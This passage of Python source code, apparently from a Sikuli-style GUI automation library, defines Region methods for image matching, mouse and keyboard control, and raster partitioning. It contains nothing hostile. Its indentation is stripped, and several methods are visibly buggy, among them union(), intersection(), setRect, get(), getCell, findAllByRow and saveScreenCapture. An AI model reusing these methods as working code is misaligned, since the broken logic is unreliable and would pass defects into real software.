return Location(self.x+(self.w/2), self.y+(self.h/2))
def getTopLeft(self):
""" Return the ``Location`` of the top left corner of this region """
return Location(self.x, self.y)
def getTopRight(self):
""" Return the ``Location`` of the top right corner of this region """
return Location(self.x+self.w, self.y)
def getBottomLeft(self):
""" Return the ``Location`` of the bottom left corner of this region """
return Location(self.x, self.y+self.h)
def getBottomRight(self):
""" Return the ``Location`` of the bottom right corner of this region """
return Location(self.x+self.w, self.y+self.h)
def getScreen(self):
""" Return an instance of the ``Screen`` object this region is inside.
Checks the top left corner of this region (if it touches multiple screens) is inside.
Returns None if the region isn't positioned in any screen.
"""
return self.getTopLeft().getScreen()
def getLastMatch(self):
""" Returns the last successful ``Match`` returned by ``find()``, ``exists()``, etc. """
return self._lastMatch
def getLastMatches(self):
""" Returns the last successful set of ``Match`` objects returned by ``findAll()`` """
return self._lastMatches
def getTime(self):
""" Returns the elapsed time in milliseconds to find the last match """
return self._lastMatchTime
def setAutoWaitTimeout(self, seconds):
""" Specify the time to wait for an image to appear on the screen """
self.autoWaitTimeout = float(seconds)
def getAutoWaitTimeout(self):
""" Returns the time to wait for an image to appear on the screen """
return self.autoWaitTimeout
def setWaitScanRate(self, seconds=None):
"""Set this Region's scan rate
A find op should repeat the search for the given Visual rate times per second until
found or the maximum waiting time is reached.
"""
self._defaultScanRate = float(seconds)
def getWaitScanRate(self):
""" Get the current scan rate """
return self._defaultScanRate if not self._defaultScanRate is None else Settings.WaitScanRate
def offset(self, location, dy=0):
""" Returns a new ``Region`` offset from this one by ``location``
Width and height remain the same
"""
if not isinstance(location, Location):
# Assume variables passed were dx,dy
location = Location(location, dy)
r = Region(self.x+location.x, self.y+location.y, self.w, self.h).clipRegionToScreen()
if r is None:
raise ValueError("Specified region is not visible on any screen")
return None
return r
def grow(self, width, height=None):
""" Expands the region by ``width`` on both sides and ``height`` on the top and bottom.
If only one value is provided, expands the region by that amount on all sides.
Equivalent to ``nearby()``.
"""
if height is None:
return self.nearby(width)
else:
return Region(
self.x-width,
self.y-height,
self.w+(2*width),
self.h+(2*height)).clipRegionToScreen()
def inside(self):
""" Returns the same object. Included for Sikuli compatibility. """
return self
def nearby(self, expand=50):
""" Returns a new Region that includes the nearby neighbourhood of the the current region.
The new region is defined by extending the current region's dimensions
all directions by range number of pixels. The center of the new region remains the
same.
"""
return Region(
self.x-expand,
self.y-expand,
self.w+(2*expand),
self.h+(2*expand)).clipRegionToScreen()
def above(self, expand=None):
""" Returns a new Region above the current region with a height of ``expand`` pixels.
Does not include the current region. If range is omitted, it reaches to the top of the
screen. The new region has the same width and x-position as the current region.
"""
if expand == None:
x = self.x
y = 0
w = self.w
h = self.y
else:
x = self.x
y = self.y - expand
w = self.w
h = expand
return Region(x, y, w, h).clipRegionToScreen()
def below(self, expand=None):
""" Returns a new Region below the current region with a height of ``expand`` pixels.
Does not include the current region. If range is omitted, it reaches to the bottom
of the screen. The new region has the same width and x-position as the current region.
"""
if expand == None:
x = self.x
y = self.y+self.h
w = self.w
h = self.getScreen().getBounds()[3] - y # Screen height
else:
x = self.x
y = self.y + self.h
w = self.w
h = expand
return Region(x, y, w, h).clipRegionToScreen()
def left(self, expand=None):
""" Returns a new Region left of the current region with a width of ``expand`` pixels.
Does not include the current region. If range is omitted, it reaches to the left border
of the screen. The new region has the same height and y-position as the current region.
"""
if expand == None:
x = 0
y = self.y
w = self.x
h = self.h
else:
x = self.x-expand
y = self.y
w = expand
h = self.h
return Region(x, y, w, h).clipRegionToScreen()
def right(self, expand=None):
""" Returns a new Region right of the current region with a width of ``expand`` pixels.
Does not include the current region. If range is omitted, it reaches to the right border
of the screen. The new region has the same height and y-position as the current region.
"""
if expand == None:
x = self.x+self.w
y = self.y
w = self.getScreen().getBounds()[2] - x
h = self.h
else:
x = self.x+self.w
y = self.y
w = expand
h = self.h
return Region(x, y, w, h).clipRegionToScreen()
def add(self, l, r, t, b):
x = self.getX() - l
y = self.getY() - t
w = self.getW() + l + r
h = self.getH() + t + b
self.setRect(x, y, w, h)
return self
def getBitmap(self):
""" Captures screen area of this region, at least the part that is on the screen
Returns image as numpy array
"""
return PlatformManager.getBitmapFromRect(self.x, self.y, self.w, self.h)
def debugPreview(self, title="Debug"):
""" Displays the region in a preview window.
If the region is a Match, circles the target area. If the region is larger than half the
primary screen in either dimension, scales it down to half size.
"""
region = self
haystack = self.getBitmap()
if isinstance(region, Match):
cv2.circle(
haystack,
(region.getTarget().x - self.x, region.getTarget().y - self.y),
5,
255)
if haystack.shape[0] > (Screen(0).getBounds()[2]/2) or haystack.shape[1] > (Screen(0).getBounds()[3]/2):
# Image is bigger than half the screen; scale it down
haystack = cv2.resize(haystack, (0, 0), fx=0.5, fy=0.5)
Image.fromarray(haystack).show()
def highlight(self, *args):
""" Highlights the region with a colored frame. Accepts the following parameters:
highlight([toEnable], [seconds], [color])
* toEnable (boolean): Enables or disables the overlay
* seconds (number): Seconds to show overlay
* color (string): Hex code ("#XXXXXX") or color name ("black")
"""
toEnable = (self._highlighter is None)
seconds = 3
color = "red"
if len(args) > 3:
raise TypeError("Unrecognized argument(s) for highlight()")
for arg in args:
if type(arg) == bool:
toEnable = arg
elif isinstance(arg, Number):
seconds = arg
elif isinstance(arg, basestring):
color = arg
if self._highlighter is not None:
self._highlighter.close()
if toEnable:
self._highlighter = PlatformManager.highlight((self.getX(), self.getY(), self.getW(), self.getH()), color, seconds)
def find(self, pattern):
""" Searches for an image pattern in the given region
Throws ``FindFailed`` exception if the image could not be found.
Sikuli supports OCR search with a text parameter. This does not (yet).
"""
findFailedRetry = True
while findFailedRetry:
match = self.exists(pattern)
if match is not None:
break
path = pattern.path if isinstance(pattern, Pattern) else pattern
findFailedRetry = self._raiseFindFailed("Could not find pattern '{}'".format(path))
if findFailedRetry:
time.sleep(self._repeatWaitTime)
return match
def findAll(self, pattern):
""" Searches for an image pattern in the given region
Returns ``Match`` object if ``pattern`` exists, empty array otherwise (does not
throw exception). Sikuli supports OCR search with a text parameter. This does not (yet).
"""
find_time = time.time()
r = self.clipRegionToScreen()
if r is None:
raise ValueError("Region outside all visible screens")
return None
seconds = self.autoWaitTimeout
if not isinstance(pattern, Pattern):
if not isinstance(pattern, basestring):
raise TypeError("find expected a string [image path] or Pattern object")
pattern = Pattern(pattern)
needle = cv2.imread(pattern.path)
if needle is None:
raise ValueError("Unable to load image '{}'".format(pattern.path))
needle_height, needle_width, needle_channels = needle.shape
positions = []
timeout = time.time() + seconds
# Check TemplateMatcher for valid matches
matches = []
while time.time() < timeout and len(matches) == 0:
matcher = TemplateMatcher(r.getBitmap())
matches = matcher.findAllMatches(needle, pattern.similarity)
time.sleep(1/self._defaultScanRate if self._defaultScanRate is not None else 1/Settings.WaitScanRate)
if len(matches) == 0:
Debug.info("Couldn't find '{}' with enough similarity.".format(pattern.path))
return iter([])
# Matches found! Turn them into Match objects
lastMatches = []
for match in matches:
position, confidence = match
x, y = position
lastMatches.append(
Match(
confidence,
pattern.offset,
((x+self.x, y+self.y), (needle_width, needle_height))))
self._lastMatches = iter(lastMatches)
Debug.info("Found match(es) for pattern '{}' at similarity ({})".format(pattern.path, pattern.similarity))
self._lastMatchTime = (time.time() - find_time) * 1000 # Capture find time in milliseconds
return self._lastMatches
def wait(self, pattern, seconds=None):
""" Searches for an image pattern in the given region, given a specified timeout period
Functionally identical to find(). If a number is passed instead of a pattern,
just waits the specified number of seconds.
Sikuli supports OCR search with a text parameter. This does not (yet).
"""
if isinstance(pattern, (int, float)):
if pattern == FOREVER:
while True:
time.sleep(1) # Infinite loop
time.sleep(pattern)
return None
if seconds is None:
seconds = self.autoWaitTimeout
findFailedRetry = True
timeout = time.time() + seconds
while findFailedRetry:
while True:
match = self.exists(pattern)
if match:
return match
if time.time() >= timeout:
break
path = pattern.path if isinstance(pattern, Pattern) else pattern
findFailedRetry = self._raiseFindFailed("Could not find pattern '{}'".format(path))
if findFailedRetry:
time.sleep(self._repeatWaitTime)
return None
def waitVanish(self, pattern, seconds=None):
""" Waits until the specified pattern is not visible on screen.
If ``seconds`` pass and the pattern is still visible, raises FindFailed exception.
Sikuli supports OCR search with a text parameter. This does not (yet).
"""
r = self.clipRegionToScreen()
if r is None:
raise ValueError("Region outside all visible screens")
return None
if seconds is None:
seconds = self.autoWaitTimeout
if not isinstance(pattern, Pattern):
if not isinstance(pattern, basestring):
raise TypeError("find expected a string [image path] or Pattern object")
pattern = Pattern(pattern)
needle = cv2.imread(pattern.path)
match = True
timeout = time.time() + seconds
while match and time.time() < timeout:
matcher = TemplateMatcher(r.getBitmap())
# When needle disappears, matcher returns None
match = matcher.findBestMatch(needle, pattern.similarity)
time.sleep(1/self._defaultScanRate if self._defaultScanRate is not None else 1/Settings.WaitScanRate)
if match:
return False
#self._findFailedHandler(FindFailed("Pattern '{}' did not vanish".format(pattern.path)))
def exists(self, pattern, seconds=None):
""" Searches for an image pattern in the given region
Returns Match if pattern exists, None otherwise (does not throw exception)
Sikuli supports OCR search with a text parameter. This does not (yet).
"""
find_time = time.time()
r = self.clipRegionToScreen()
if r is None:
raise ValueError("Region outside all visible screens")
return None
if seconds is None:
seconds = self.autoWaitTimeout
if isinstance(pattern, int):
# Actually just a "wait" statement
time.sleep(pattern)
return
if not pattern:
time.sleep(seconds)
if not isinstance(pattern, Pattern):
if not isinstance(pattern, basestring):
raise TypeError("find expected a string [image path] or Pattern object")
pattern = Pattern(pattern)
needle = cv2.imread(pattern.path)
if needle is None:
raise ValueError("Unable to load image '{}'".format(pattern.path))
needle_height, needle_width, needle_channels = needle.shape
match = None
timeout = time.time() + seconds
# Consult TemplateMatcher to find needle
while not match:
matcher = TemplateMatcher(r.getBitmap())
match = matcher.findBestMatch(needle, pattern.similarity)
time.sleep(1/self._defaultScanRate if self._defaultScanRate is not None else 1/Settings.WaitScanRate)
if time.time() > timeout:
break
if match is None:
Debug.info("Couldn't find '{}' with enough similarity.".format(pattern.path))
return None
# Translate local position into global screen position
position, confidence = match
position = (position[0] + self.x, position[1] + self.y)
self._lastMatch = Match(
confidence,
pattern.offset,
(position, (needle_width, needle_height)))
#self._lastMatch.debug_preview()
Debug.info("Found match for pattern '{}' at ({},{}) with confidence ({}). Target at ({},{})".format(
pattern.path,
self._lastMatch.getX(),
self._lastMatch.getY(),
self._lastMatch.getScore(),
self._lastMatch.getTarget().x,
self._lastMatch.getTarget().y))
self._lastMatchTime = (time.time() - find_time) * 1000 # Capture find time in milliseconds
return self._lastMatch
def click(self, target=None, modifiers=""):
""" Moves the cursor to the target location and clicks the default mouse button. """
if target is None:
target = self._lastMatch or self # Whichever one is not None
target_location = None
if isinstance(target, Pattern):
target_location = self.find(target).getTarget()
elif isinstance(target, basestring):
target_location = self.find(target).getTarget()
elif isinstance(target, Match):
target_location = target.getTarget()
elif isinstance(target, Region):
target_location = target.getCenter()
elif isinstance(target, Location):
target_location = target
else:
raise TypeError("click expected Pattern, String, Match, Region, or Location object")
if modifiers != "":
keyboard.keyDown(modifiers)
Mouse.moveSpeed(target_location, Settings.MoveMouseDelay)
time.sleep(0.1) # For responsiveness
if Settings.ClickDelay > 0:
time.sleep(min(1.0, Settings.ClickDelay))
Settings.ClickDelay = 0.0
Mouse.click()
time.sleep(0.1)
if modifiers != 0:
keyboard.keyUp(modifiers)
Debug.history("Clicked at {}".format(target_location))
def doubleClick(self, target=None, modifiers=""):
""" Moves the cursor to the target location and double-clicks the default mouse button. """
if target is None:
target = self._lastMatch or self # Whichever one is not None
target_location = None
if isinstance(target, Pattern):
target_location = self.find(target).getTarget()
elif isinstance(target, basestring):
target_location = self.find(target).getTarget()
elif isinstance(target, Match):
target_location = target.getTarget()
elif isinstance(target, Region):
target_location = target.getCenter()
elif isinstance(target, Location):
target_location = target
else:
raise TypeError("doubleClick expected Pattern, String, Match, Region, or Location object")
if modifiers != "":
keyboard.keyDown(modifiers)
Mouse.moveSpeed(target_location, Settings.MoveMouseDelay)
time.sleep(0.1)
if Settings.ClickDelay > 0:
time.sleep(min(1.0, Settings.ClickDelay))
Settings.ClickDelay = 0.0
Mouse.click()
time.sleep(0.1)
if Settings.ClickDelay > 0:
time.sleep(min(1.0, Settings.ClickDelay))
Settings.ClickDelay = 0.0
Mouse.click()
time.sleep(0.1)
if modifiers != 0:
keyboard.keyUp(modifiers)
def rightClick(self, target=None, modifiers=""):
""" Moves the cursor to the target location and clicks the right mouse button. """
if target is None:
target = self._lastMatch or self # Whichever one is not None
target_location = None
if isinstance(target, Pattern):
target_location = self.find(target).getTarget()
elif isinstance(target, basestring):
target_location = self.find(target).getTarget()
elif isinstance(target, Match):
target_location = target.getTarget()
elif isinstance(target, Region):
target_location = target.getCenter()
elif isinstance(target, Location):
target_location = target
else:
raise TypeError("rightClick expected Pattern, String, Match, Region, or Location object")
if modifiers != "":
keyboard.keyDown(modifiers)
Mouse.moveSpeed(target_location, Settings.MoveMouseDelay)
time.sleep(0.1)
if Settings.ClickDelay > 0:
time.sleep(min(1.0, Settings.ClickDelay))
Settings.ClickDelay = 0.0
Mouse.click(button=Mouse.RIGHT)
time.sleep(0.1)
if modifiers != "":
keyboard.keyUp(modifiers)
def hover(self, target=None):
""" Moves the cursor to the target location """
if target is None:
target = self._lastMatch or self # Whichever one is not None
target_location = None
if isinstance(target, Pattern):
target_location = self.find(target).getTarget()
elif isinstance(target, basestring):
target_location = self.find(target).getTarget()
elif isinstance(target, Match):
target_location = target.getTarget()
elif isinstance(target, Region):
target_location = target.getCenter()
elif isinstance(target, Location):
target_location = target
else:
raise TypeError("hover expected Pattern, String, Match, Region, or Location object")
Mouse.moveSpeed(target_location, Settings.MoveMouseDelay)
def drag(self, dragFrom=None):
""" Starts a dragDrop operation.
Moves the cursor to the target location and clicks the mouse in preparation to drag
a screen element """
if dragFrom is None:
dragFrom = self._lastMatch or self # Whichever one is not None
dragFromLocation = None
if isinstance(dragFrom, Pattern):
dragFromLocation = self.find(dragFrom).getTarget()
elif isinstance(dragFrom, basestring):
dragFromLocation = self.find(dragFrom).getTarget()
elif isinstance(dragFrom, Match):
dragFromLocation = dragFrom.getTarget()
elif isinstance(dragFrom, Region):
dragFromLocation = dragFrom.getCenter()
elif isinstance(dragFrom, Location):
dragFromLocation = dragFrom
else:
raise TypeError("drag expected dragFrom to be Pattern, String, Match, Region, or Location object")
Mouse.moveSpeed(dragFromLocation, Settings.MoveMouseDelay)
time.sleep(Settings.DelayBeforeMouseDown)
Mouse.buttonDown()
Debug.history("Began drag at {}".format(dragFromLocation))
def dropAt(self, dragTo=None, delay=None):
""" Completes a dragDrop operation
Moves the cursor to the target location, waits ``delay`` seconds, and releases the mouse
button """
if dragTo is None:
dragTo = self._lastMatch or self # Whichever one is not None
if isinstance(dragTo, Pattern):
dragToLocation = self.find(dragTo).getTarget()
elif isinstance(dragTo, basestring):
dragToLocation = self.find(dragTo).getTarget()
elif isinstance(dragTo, Match):
dragToLocation = dragTo.getTarget()
elif isinstance(dragTo, Region):
dragToLocation = dragTo.getCenter()
elif isinstance(dragTo, Location):
dragToLocation = dragTo
else:
raise TypeError("dragDrop expected dragTo to be Pattern, String, Match, Region, or Location object")
Mouse.moveSpeed(dragToLocation, Settings.MoveMouseDelay)
time.sleep(delay if delay is not None else Settings.DelayBeforeDrop)
Mouse.buttonUp()
Debug.history("Ended drag at {}".format(dragToLocation))
def dragDrop(self, target, target2=None, modifiers=""):
""" Performs a dragDrop operation.
Holds down the mouse button on ``dragFrom``, moves the mouse to ``dragTo``, and releases
the mouse button.
``modifiers`` may be a typeKeys() compatible string. The specified keys will be held
during the drag-drop operation.
"""
if modifiers != "":
keyboard.keyDown(modifiers)
if target2 is None:
dragFrom = self._lastMatch
dragTo = target
else:
dragFrom = target
dragTo = target2
self.drag(dragFrom)
time.sleep(Settings.DelayBeforeDrag)
self.dropAt(dragTo)
if modifiers != "":
keyboard.keyUp(modifiers)
def type(self, *args):
""" Usage: type([PSMRL], text, [modifiers])
If a pattern is specified, the pattern is clicked first. Doesn't support text paths.
Special keys can be entered with the key name between brackets, as `"{SPACE}"`, or as
`Key.SPACE`.
"""
pattern = None
text = None
modifiers = None
if len(args) == 1 and isinstance(args[0], basestring):
# Is a string (or Key) to type
text = args[0]
elif len(args) == 2:
if not isinstance(args[0], basestring) and isinstance(args[1], basestring):
pattern = args[0]
text = args[1]
else:
text = args[0]
modifiers = args[1]
elif len(args) == 3 and not isinstance(args[0], basestring):
pattern = args[0]
text = args[1]
modifiers = args[2]
else:
raise TypeError("type method expected ([PSMRL], text, [modifiers])")
if pattern:
self.click(pattern)
Debug.history("Typing '{}' with modifiers '{}'".format(text, modifiers))
kb = keyboard
if modifiers:
kb.keyDown(modifiers)
if Settings.TypeDelay > 0:
typeSpeed = min(1.0, Settings.TypeDelay)
Settings.TypeDelay = 0.0
else:
typeSpeed = self._defaultTypeSpeed
kb.type(text, typeSpeed)
if modifiers:
kb.keyUp(modifiers)
time.sleep(0.2)
def paste(self, *args):
""" Usage: paste([PSMRL], text)
If a pattern is specified, the pattern is clicked first. Doesn't support text paths.
``text`` is pasted as is using the OS paste shortcut (Ctrl+V for Windows/Linux, Cmd+V
for OS X). Note that `paste()` does NOT use special formatting like `type()`.
"""
target = None
text = ""
if len(args) == 1 and isinstance(args[0], basestring):
text = args[0]
elif len(args) == 2 and isinstance(args[1], basestring):
self.click(target)
text = args[1]
else:
raise TypeError("paste method expected [PSMRL], text")
pyperclip.copy(text)
# Triggers OS paste for foreground window
PlatformManager.osPaste()
time.sleep(0.2)
def getClipboard(self):
""" Returns the contents of the clipboard
Can be used to pull outside text into the application, if it is first
copied with the OS keyboard shortcut (e.g., "Ctrl+C") """
return pyperclip.paste()
def text(self):
""" OCR method. Todo. """
raise NotImplementedError("OCR not yet supported")
def mouseDown(self, button=Mouse.LEFT):
""" Low-level mouse actions. """
return Mouse.buttonDown(button)
def mouseUp(self, button=Mouse.LEFT):
""" Low-level mouse actions """
return Mouse.buttonUp(button)
def mouseMove(self, PSRML=None, dy=0):
""" Low-level mouse actions """
if PSRML is None:
PSRML = self._lastMatch or self # Whichever one is not None
if isinstance(PSRML, Pattern):
move_location = self.find(PSRML).getTarget()
elif isinstance(PSRML, basestring):
move_location = self.find(PSRML).getTarget()
elif isinstance(PSRML, Match):
move_location = PSRML.getTarget()
elif isinstance(PSRML, Region):
move_location = PSRML.getCenter()
elif isinstance(PSRML, Location):
move_location = PSRML
elif isinstance(PSRML, int):
# Assume called as mouseMove(dx, dy)
offset = Location(PSRML, dy)
move_location = Mouse.getPos().offset(offset)
else:
raise TypeError("doubleClick expected Pattern, String, Match, Region, or Location object")
Mouse.moveSpeed(move_location)
def wheel(self, *args): # [PSRML], direction, steps
""" Clicks the wheel the specified number of ticks. Use the following parameters:
wheel([PSRML], direction, steps, [stepDelay])
"""
if len(args) == 2:
PSRML = None
direction = int(args[0])
steps = int(args[1])
stepDelay = None
elif len(args) == 3:
PSRML = args[0]
direction = int(args[1])
steps = int(args[2])
stepDelay = None
elif len(args) == 4:
PSRML = args[0]
direction = int(args[1])
steps = int(args[2])
stepDelay = int(args[3])
if PSRML is not None:
self.mouseMove(PSRML)
Mouse.wheel(direction, steps)
def atMouse(self):
return Mouse.at()
def keyDown(self, keys):
""" Concatenate multiple keys to press them all down. """
return keyboard.keyDown(keys)
def keyUp(self, keys):
""" Concatenate multiple keys to up them all. """
return keyboard.keyUp(keys)
def write(self, text):
""" Has fancy special options. Not implemented yet. """
raise NotImplementedError()
def delayType(millisecs):
Settings.TypeDelay = millisecs
def isRegionValid(self):
""" Returns false if the whole region is not even partially inside any screen, otherwise true """
screens = PlatformManager.getScreenDetails()
for screen in screens:
s_x, s_y, s_w, s_h = screen["rect"]
if self.x+self.w >= s_x and s_x+s_w >= self.x and self.y+self.h >= s_y and s_y+s_h >= self.y:
# Rects overlap
return True
return False
def clipRegionToScreen(self):
""" Returns the part of the region that is visible on a screen
If the region equals to all visible screens, returns Screen(-1).
If the region is visible on multiple screens, returns the screen with the smallest ID.
Returns None if the region is outside the screen.
"""
if not self.isRegionValid():
return None
screens = PlatformManager.getScreenDetails()
total_x, total_y, total_w, total_h = Screen(-1).getBounds()
containing_screen = None
for screen in screens:
s_x, s_y, s_w, s_h = screen["rect"]
if self.x >= s_x and self.x+self.w <= s_x+s_w and self.y >= s_y and self.y+self.h <= s_y+s_h:
# Region completely inside screen
return self
elif self.x+self.w <= s_x or s_x+s_w <= self.x or self.y+self.h <= s_y or s_y+s_h <= self.y:
# Region completely outside screen
continue
elif self.x == total_x and self.y == total_y and self.w == total_w and self.h == total_h:
# Region equals all screens, Screen(-1)
return self
else:
# Region partially inside screen
x = max(self.x, s_x)
y = max(self.y, s_y)
w = min(self.w, s_w)
h = min(self.h, s_h)
return Region(x, y, w, h)
return None
# Partitioning constants
NORTH = 202 # Upper half
NORTH_WEST = 300 # Left third in upper third
NORTH_MID = 301 # Middle third in upper third
NORTH_EAST = 302 # Right third in upper third
SOUTH = 212 # Lower half
SOUTH_WEST = 320 # Left third in lower third
SOUTH_MID = 321 # Middle third in lower third
SOUTH_EAST = 322 # Right third in lower third
EAST = 220 # Right half
EAST_MID = 310 # Middle third in right third
WEST = 221 # Left half
WEST_MID = 312 # Middle third in left third
MID_THIRD = 311 # Middle third in middle third
TT = 200 # Top left quarter
RR = 201 # Top right quarter
BB = 211 # Bottom right quarter
LL = 210 # Bottom left quarter
MID_VERTICAL = "MID_VERT" # Half of width vertically centered
MID_HORIZONTAL = "MID_HORZ" # Half of height horizontally centered
MID_BIG = "MID_HALF" # Half of width/half of height centered
def setRaster(self, rows, columns):
""" Sets the raster for the region, allowing sections to be indexed by row/column """
rows = int(rows)
columns = int(columns)
if rows <= 0 or columns <= 0:
return self
self._raster = (rows, columns)
return self.getCell(0, 0)
def getRow(self, row, numberRows=None):
""" Returns the specified row of the region (if the raster is set)
If numberRows is provided, uses that instead of the raster
"""
row = int(row)
if self._raster[0] == 0 or self._raster[1] == 0:
return self
if numberRows is None or numberRows < 1 or numberRows > 9:
numberRows = self._raster[0]
rowHeight = self.h / numberRows
if row < 0:
# If row is negative, count backwards from the end
row = numberRows - row
if row < 0:
# Bad row index, return last row
return Region(self.x, self.y+self.h-rowHeight, self.w, rowHeight)
elif row > numberRows:
# Bad row index, return first row
return Region(self.x, self.y, self.w, rowHeight)
return Region(self.x, self.y + (row * rowHeight), self.w, rowHeight)
def getCol(self, column, numberColumns=None):
""" Returns the specified column of the region (if the raster is set)
If numberColumns is provided, uses that instead of the raster
"""
column = int(column)
if self._raster[0] == 0 or self._raster[1] == 0:
return self
if numberColumns is None or numberColumns < 1 or numberColumns > 9:
numberColumns = self._raster[1]
columnWidth = self.w / numberColumns
if column < 0:
# If column is negative, count backwards from the end
column = numberColumns - column
if column < 0:
# Bad column index, return last column
return Region(self.x+self.w-columnWidth, self.y, columnWidth, self.h)
elif column > numberColumns:
# Bad column index, return first column
return Region(self.x, self.y, columnWidth, self.h)
return Region(self.x + (column * columnWidth), self.y, columnWidth, self.h)
def getCell(self, row, column):
""" Returns the specified cell (if a raster is set for the region) """
row = int(row)
column = int(column)
if self._raster[0] == 0 or self._raster[1] == 0:
return self
rowHeight = self.h / self._raster[0]
columnWidth = self.h / self._raster[1]
if column < 0:
# If column is negative, count backwards from the end
column = self._raster[1] - column
if column < 0:
# Bad column index, return last column
column = self._raster[1]
elif column > self._raster[1]:
# Bad column index, return first column
column = 0
if row < 0:
# If row is negative, count backwards from the end
row = self._raster[0] - row
if row < 0:
# Bad row index, return last row
row = self._raster[0]
elif row > self._raster[0]:
# Bad row index, return first row
row = 0
return Region(self.x+(column*columnWidth), self.y+(row*rowHeight), columnWidth, rowHeight)
def get(self, part):
""" Returns a section of the region as a new region
Accepts partitioning constants, e.g. Region.NORTH, Region.NORTH_WEST, etc.
Also accepts an int 200-999:
* First digit: Raster (*n* rows by *n* columns)
* Second digit: Row index (if equal to raster, gets the whole row)
* Third digit: Column index (if equal to raster, gets the whole column)
Region.get(522) will use a raster of 5 rows and 5 columns and return
the cell in the middle.
Region.get(525) will use a raster of 5 rows and 5 columns and return the row in the middle.
"""
if part == self.MID_VERTICAL:
return Region(self.x+(self.w/4), y, self.w/2, self.h)
elif part == self.MID_HORIZONTAL:
return Region(self.x, self.y+(self.h/4), self.w, self.h/2)
elif part == self.MID_BIG:
return Region(self.x+(self.w/4), self.y+(self.h/4), self.w/2, self.h/2)
elif isinstance(part, int) and part >= 200 and part <= 999:
raster, row, column = str(part)
self.setRaster(raster, raster)
if row == raster and column == raster:
return self
elif row == raster:
return self.getCol(column)
elif column == raster:
return self.getRow(row)
else:
return self.getCell(row,column)
else:
return self
def setRows(self, rows):
""" Sets the number of rows in the raster (if columns have not been initialized, set to 1 as well) """
self._raster[0] = rows
if self._raster[1] == 0:
self._raster[1] = 1
def setCols(self, columns):
""" Sets the number of columns in the raster (if rows have not been initialized, set to 1 as well) """
self._raster[1] = columns
if self._raster[0] == 0:
self._raster[0] = 1
def isRasterValid(self):
return self.getCols() > 0 and self.getRows() > 0
def getRows(self):
return self._raster[0]
def getCols(self):
return self._raster[1]
def getRowH(self):
if self._raster[0] == 0:
return 0
return self.h / self._raster[0]
def getColW(self):
if self._raster[1] == 0:
return 0
return self.w / self._raster[1]
def showScreens(self):
""" Synonym for showMonitors """
Screen.showMonitors()
def resetScreens(self):
""" Synonym for resetMonitors """
Screen.resetMonitors()
def getTarget(self):
""" By default, a region's target is its center """
return self.getCenter()
def setCenter(self, loc):
""" Move this region so it is centered on ``loc`` """
offset = self.getCenter().getOffset(loc) # Calculate offset from current center
return self.setLocation(self.getTopLeft().offset(offset)) # Move top left corner by the same offset
def setTopLeft(self, loc):
""" Move this region so its top left corner is on ``loc`` """
return self.setLocation(loc)
def setTopRight(self, loc):
""" Move this region so its top right corner is on ``loc`` """
offset = self.getTopRight().getOffset(loc) # Calculate offset from current top right
return self.setLocation(self.getTopLeft().offset(offset)) # Move top left corner by the same offset
def setBottomLeft(self, loc):
""" Move this region so its bottom left corner is on ``loc`` """
offset = self.getBottomLeft().getOffset(loc) # Calculate offset from current bottom left
return self.setLocation(self.getTopLeft().offset(offset)) # Move top left corner by the same offset
def setBottomRight(self, loc):
""" Move this region so its bottom right corner is on ``loc`` """
offset = self.getBottomRight().getOffset(loc) # Calculate offset from current bottom right
return self.setLocation(self.getTopLeft().offset(offset)) # Move top left corner by the same offset
def setSize(self, w, h):
""" Sets the new size of the region """
self.setW(w)
self.setH(h)
return self
def setRect(self, *args):
""" Sets the rect of the region. Accepts the following arguments:
setRect(rect_tuple)
setRect(x, y, w, h)
setRect(rect_region)
"""
if len(args) == 1:
if isinstance(args[0], tuple):
x, y, w, h = args[0]
elif isinstance(args[0], Region):
x = Region.getX()
y = Region.getY()
w = Region.getW()
h = Region.getH()
else:
raise TypeError("Unrecognized arguments for setRect")
elif len(args) == 4:
x, y, w, h = args
else:
raise TypeError("Unrecognized arguments for setRect")
self.setX(x)
self.setY(y)
self.setW(w)
self.setH(h)
return self
def saveScreenCapture(self, path=None, name=None):
""" Saves the region's bitmap """
bitmap = self.getBitmap()
target_file = None
if path is None and name is None:
_, target_file = tempfile.mkstemp(".png")
elif name is None:
_, tpath = tempfile.mkstemp(".png")
target_file = os.path.join(path, tfile)
else:
target_file = os.path.join(path, name+".png")
cv2.imwrite(target_file, bitmap)
return target_file
def getLastScreenImage(self):
""" Gets the last image taken on this region's screen """
return self.getScreen().getLastScreenImageFromScreen()
def saveLastScreenImage(self):
""" Saves the last image taken on this region's screen to a temporary file """
bitmap = self.getLastScreenImage()
_, target_file = tempfile.mkstemp(".png")
cv2.imwrite(target_file, bitmap)
def asOffset(self):
""" Returns bottom right corner as offset from top left corner """
return Location(self.getW(), self.getH())
def rightAt(self, offset=0):
""" Returns point in the center of the region's right side (offset to the right
by ``offset``) """
return Location(self.getX() + self.getW() + offset, self.getY() + (self.getH() / 2))
def leftAt(self, offset=0):
""" Returns point in the center of the region's left side (offset to the left
by negative ``offset``) """
return Location(self.getX() + offset, self.getY() + (self.getH() / 2))
def aboveAt(self, offset=0):
""" Returns point in the center of the region's top side (offset to the top
by negative ``offset``) """
return Location(self.getX() + (self.getW() / 2), self.getY() + offset)
def bottomAt(self, offset=0):
""" Returns point in the center of the region's bottom side (offset to the bottom
by ``offset``) """
return Location(self.getX() + (self.getW() / 2), self.getY() + self.getH() + offset)
def union(ur):
""" Returns a new region that contains both this region and the specified region """
x = min(self.getX(), ur.getX())
y = min(self.getY(), ur.getY())
w = max(self.getBottomRight().x, ur.getBottomRight().x) - x
h = max(self.getBottomRight().y, ur.getBottomRight().y) - y
return Region(x, y, w, h)
def intersection(ir):
""" Returns a new region that contains the overlapping portion of this region and the specified region (may be None) """
x = max(self.getX(), ur.getX())
y = max(self.getY(), ur.getY())
w = min(self.getBottomRight().x, ur.getBottomRight().x) - x
h = min(self.getBottomRight().y, ur.getBottomRight().y) - y
if w > 0 and h > 0:
return Region(x, y, w, h)
return None
def findAllByRow(self, target):
""" Returns an array of rows in the region (defined by the raster), each
row containing all matches in that row for the target pattern. """
row_matches = []
for row_index in range(self._raster[0]):
row = self.getRow(row_index)
row_matches[row_index] = row.findAll(target)
return row_matches
def findAllBycolumn(self, target):
""" Returns an array of columns in the region (defined by the raster), each
column containing all matches in that column for the target pattern. """
column_matches = []
for column_index in range(self._raster[1]):
column = self.getRow(column_index)
column_matches[column_index] = column.findAll(target)
return column_matches
def findBest(self, pattern):
""" Returns the *best* match in the region (instead of the first match) """
findFailedRetry = True
while findFailedRetry:
best_match = None
all_matches = self.findAll(pattern)
for match in all_matches:
if best_match is None or best_match.getScore() < match.getScore():
best_match = match
self._lastMatch = best_match
if best_match is not None:
break
